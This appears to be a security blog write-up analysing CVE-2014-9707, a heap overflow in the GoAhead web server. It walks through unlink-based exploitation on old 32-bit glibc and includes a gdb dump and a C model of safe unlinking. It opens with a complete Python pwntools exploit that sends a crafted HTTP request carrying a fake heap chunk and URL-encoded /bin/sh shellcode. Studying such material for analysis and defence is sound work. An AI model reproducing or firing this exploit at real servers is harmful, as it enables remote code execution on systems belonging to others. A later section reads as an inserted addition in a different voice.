Looking at the unlink exploit through CVE-2014-9707: Vulnerability Wars, the black bar safety net

2016-09-21T00:00:00
ID MYHACK58:62201679457
Type myhack58
Reporter k0shl
Modified 2016-09-21T00:00:00

Description

Foreword

Recently I have been reading Springs' Vulnerability Wars: Essentials of Software Vulnerability Analysis. I have not been doing binary work for long, but I think this book is particularly good, mainly because it covers the great majority of common vulnerability types and, for each one, manages to reduce the bug to a basic vulnerability model. Speaking of vulnerability models, I recently came across a very interesting vulnerability, the protagonist of this article: CVE-2014-9707, a heap overflow in the GoAhead web server on Linux. While analysing it I found that it can be reduced to a very interesting and very common basic model, which helped a rookie like me a great deal in learning Linux heap overflow exploitation, so I have written up the whole process to share with you. Finally, I want to thank fneig and explorer for their guidance.

Vulnerability analysis

First, here is the PoC for this vulnerability (Python 2, using pwntools):

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *


def hex2url(i):
    # Encode an integer as little-endian, URL-escaped bytes (%xx%xx...).
    array = format(i, 'X')
    if len(array) % 2 != 0:
        array = '0' + array
    ret = ''.join('%' + array[i-2:i] for i in xrange(len(array), 0, -2))
    return ret


def fake(chunk_addr):
    print(hex(chunk_addr))
    chunk = int(hex(chunk_addr)[0:8], 16) + 1
    print(chunk)
    fake_fd = hex(chunk)
    fake_chunk_addr = int(fake_fd + '2f', 16)
    fake_bk = fake_chunk_addr - 8
    return fake_chunk_addr, int(fake_fd, 16), fake_bk


def make_fake_chunk(chunk_addr):
    # Place the fake chunk at an address ending in 0x2f ('/') within the page.
    chunk = (chunk_addr & ~0xff) + 0x12f
    fd = int(format(chunk, '08X')[:6], 16)
    bk = chunk
    return fd, bk, chunk


pro = remote('localhost', 80)
chunk = 0x8057840
fd, bk, fake_chunk = make_fake_chunk(chunk)
print(hex(fd), hex(bk), hex(fake_chunk))

shellcode = '%eb%16%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90'
shellcode += "%eb%19%5e%31%d2%89%56%07%52%56%89%e1%89%f3%31%c0%b0%0b%cd"
shellcode += "%80%31%db%31%c0%40%cd%80%e8%e2%ff%ff%ff%2f%62%69"
shellcode += "%6e%2f%73%68"
shellcode_addr = fake_chunk + 4 * 4
offset = 0

exp = 'GET /'
exp += hex2url(fd)                  # fd
exp += hex2url(bk)                  # bk
exp += hex2url(0xbffff2ac - 20)     # fd_next, stack
exp += hex2url(shellcode_addr)      # bk_next
pad = fake_chunk - chunk - 16
print('pad:{0}'.format(pad))

# fake chunk
exp += 'A' * (fake_chunk - chunk - 16)
exp += hex2url(0x01020304)          # prev_size
exp += hex2url(0x01020304)          # size
exp += hex2url(chunk - 8)           # fd
exp += hex2url(chunk - 8)           # bk
exp += shellcode
print('--{}'.format(1024 - (fake_chunk - chunk) - 16 - len(shellcode)/3))
exp += '/./'
exp += hex2url(2) * 50
exp += 'A' * (1024 - (fake_chunk - chunk) - 16 - len(shellcode) / 3 - 50)
exp += '/.ssss'
# exp += 'A'*1024
exp += 'HTTP/1.0\r\n\r\n'
print(len(exp))
print(exp)
pro.send(exp)
```

This is a very interesting heap overflow vulnerability. GoAhead is a well-known web server. When it handles an incoming request it performs some processing on the request data, and the length after processing is never checked against the length before it, so the later part of the request is written into a buffer that was allocated earlier. If the later data is too long, that earlier buffer overflows. The buffer was allocated with malloc, so after the overflow some key pointers and variables can be overwritten, and when the heap chunk is freed an unlink is triggered, which leads to arbitrary code execution. The vulnerability is analysed in detail below.

First start GoAhead, attach gdb to its pid, and then run the exp. The program is interrupted and the breakpoint hits:

```
gdb-peda$ c
Continuing.

Program received signal SIGABRT, Aborted.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x545
ECX: 0x545
EDX: 0x6
ESI: 0x45 ('E')
EDI: 0xb7eec000 --> 0x1a5da8
EBP: 0xbffff178 --> 0x805cb28 --> 0x0
ESP: 0xbfffeeb4 --> 0xbffff178 --> 0x805cb28 --> 0x0
EIP: 0xb7fdebe0 (: pop ebp)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7fdebdc : nop
   0xb7fdebdd : nop
   0xb7fdebde : int 0x80
=> 0xb7fdebe0 : pop ebp
   0xb7fdebe1 : pop edx
   0xb7fdebe2 : pop ecx
   0xb7fdebe3 : ret
```
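The basic model behind the exploit above is the unlink step that malloc performs when a free chunk is taken out of its doubly linked list: with the chunk's fd and bk overwritten, the two pointer writes of the unlink become attacker-chosen writes. The following C program is an added example, not code from this article or from GoAhead, that models that step on a constructed free list: it contrasts the classic, trusting unlink with the "safe unlinking" check that glibc performs today (it aborts with "corrupted double-linked list" when the neighbours do not point back at the chunk). The names victim_region and attacker_area are placeholders constructed here; the chunk layout follows glibc's malloc_chunk.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Layout of a free chunk as glibc's malloc sees it. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;   /* next free chunk in the bin */
    struct chunk *bk;   /* previous free chunk in the bin */
};

/* Classic unlink as in old dlmalloc/glibc: trusts fd and bk. If an overflow
 * has replaced them, this is two attacker-chosen writes:
 * fd->bk = bk  and  bk->fd = fd. That is the primitive the PoC relies on. */
static void classic_unlink(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* Safe unlink: the check glibc added. Both neighbours must point back at p.
 * Returns 0 when the list is consistent and the chunk was unlinked,
 * -1 when the check fails and nothing is written. */
static int safe_unlink(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* Build the circular list head <-> a <-> b <-> head (constructed input). */
static void build_list(struct chunk *head, struct chunk *a, struct chunk *b) {
    memset(head, 0, sizeof *head);
    memset(a, 0, sizeof *a);
    memset(b, 0, sizeof *b);
    head->fd = a; a->bk = head;
    a->fd = b;    b->bk = a;
    b->fd = head; head->bk = b;
}

/* Normal case: unlinking a from an intact list passes the check and leaves
 * head <-> b. Returns 1 on success. */
int demo_intact(void) {
    struct chunk head, a, b;
    build_list(&head, &a, &b);
    if (safe_unlink(&a) != 0)
        return 0;
    return head.fd == &b && b.bk == &head && b.fd == &head && head.bk == &b;
}

/* Overflow case with the classic unlink. victim_region.bk stands in for a
 * pointer the attacker wants to overwrite (in a real exploit fd is set to
 * target - offsetof(struct chunk, bk), the "chunk - 8" style arithmetic seen
 * in the PoC); attacker_area stands in for attacker-controlled memory such as
 * the buffer holding the shellcode. Returns 1 if the victim pointer now
 * points at attacker_area. */
int demo_corrupted_classic(void) {
    static struct chunk victim_region, attacker_area;
    struct chunk p;
    memset(&victim_region, 0, sizeof victim_region);
    memset(&attacker_area, 0, sizeof attacker_area);
    memset(&p, 0, sizeof p);
    p.fd = &victim_region;   /* value planted by the overflow */
    p.bk = &attacker_area;   /* value planted by the overflow */
    classic_unlink(&p);
    return victim_region.bk == &attacker_area;
}

/* Same corrupted chunk with the safe unlink: neither neighbour points back
 * at p, so the check fails and the victim pointer is untouched. Returns 1
 * when the corruption is detected and nothing was written. */
int demo_corrupted_safe(void) {
    static struct chunk victim_region, attacker_area;
    struct chunk p;
    memset(&victim_region, 0, sizeof victim_region);
    memset(&attacker_area, 0, sizeof attacker_area);
    memset(&p, 0, sizeof p);
    p.fd = &victim_region;
    p.bk = &attacker_area;
    int rc = safe_unlink(&p);
    return rc == -1 && victim_region.bk == NULL && attacker_area.fd == NULL;
}

int main(void) {
    printf("intact list unlinked cleanly: %d\n", demo_intact());
    printf("classic unlink redirected the victim pointer: %d\n", demo_corrupted_classic());
    printf("safe unlink rejected the corrupted chunk: %d\n", demo_corrupted_safe());
    return 0;
}
```

The point of the safe check is that a chunk whose fd/bk were simply overwritten can no longer be unlinked: the word at fd->bk and the word at bk->fd would both already have to contain the chunk's own address, which is why the plain fd/bk overwrite used on the old 32-bit glibc in this article is detected and aborted by current allocators. Keeping the allocator current is therefore a real mitigation for this class of bug, independent of fixing the missing length check in the server itself.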
